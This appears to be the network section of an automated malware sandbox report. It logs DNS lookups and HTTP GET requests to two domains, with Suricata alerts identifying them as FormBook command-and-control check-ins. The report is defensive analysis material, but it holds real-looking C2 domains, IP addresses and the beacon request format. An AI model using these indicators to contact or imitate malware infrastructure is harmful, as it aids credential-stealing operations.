Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.toulouse.gold | 146.59.209.152 | |
www.illuminati4me.com |
CNAME
illuminati4me.com
|
192.0.78.24 |
GET
301
http://www.illuminati4me.com/btrd/?XB64XRIP=Q3kWi+9T/dHMca9G7DTYQaSHZDljXDmr3SofoM0gc2X08uuBa26GyxCTZUnwgLp1nNqssc/W&Sb=M4_TiVj0
REQUEST
RESPONSE
BODY
GET /btrd/?XB64XRIP=Q3kWi+9T/dHMca9G7DTYQaSHZDljXDmr3SofoM0gc2X08uuBa26GyxCTZUnwgLp1nNqssc/W&Sb=M4_TiVj0 HTTP/1.1
Host: www.illuminati4me.com
Connection: close
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Sep 2023 08:53:11 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.illuminati4me.com/btrd/?XB64XRIP=Q3kWi+9T/dHMca9G7DTYQaSHZDljXDmr3SofoM0gc2X08uuBa26GyxCTZUnwgLp1nNqssc/W&Sb=M4_TiVj0
X-ac: 3.nrt _bur BYPASS
GET
301
http://www.toulouse.gold/btrd/?XB64XRIP=C9MKbEJ42g9S0MCpcUewgohkksZhTB/BdRb4Z/jCobVWG7RtmOeI1/6J7rJ1m23I813d/GU/&Sb=M4_TiVj0
REQUEST
RESPONSE
BODY
GET /btrd/?XB64XRIP=C9MKbEJ42g9S0MCpcUewgohkksZhTB/BdRb4Z/jCobVWG7RtmOeI1/6J7rJ1m23I813d/GU/&Sb=M4_TiVj0 HTTP/1.1
Host: www.toulouse.gold
Connection: close
HTTP/1.1 301 Moved Permanently
date: Tue, 19 Sep 2023 08:53:34 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
server: Apache
x-powered-by: PHP/7.4
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
x-redirect-by: WordPress
location: http://toulouse.gold/btrd/?XB64XRIP=C9MKbEJ42g9S0MCpcUewgohkksZhTB/BdRb4Z/jCobVWG7RtmOeI1/6J7rJ1m23I813d/GU/&Sb=M4_TiVj0
x-iplb-request-id: AFD08698:C00E_923BD198:0050_6509618C_1A8F2:124FA
x-iplb-instance: 41929
connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49165 -> 192.0.78.24:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49166 -> 146.59.209.152:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts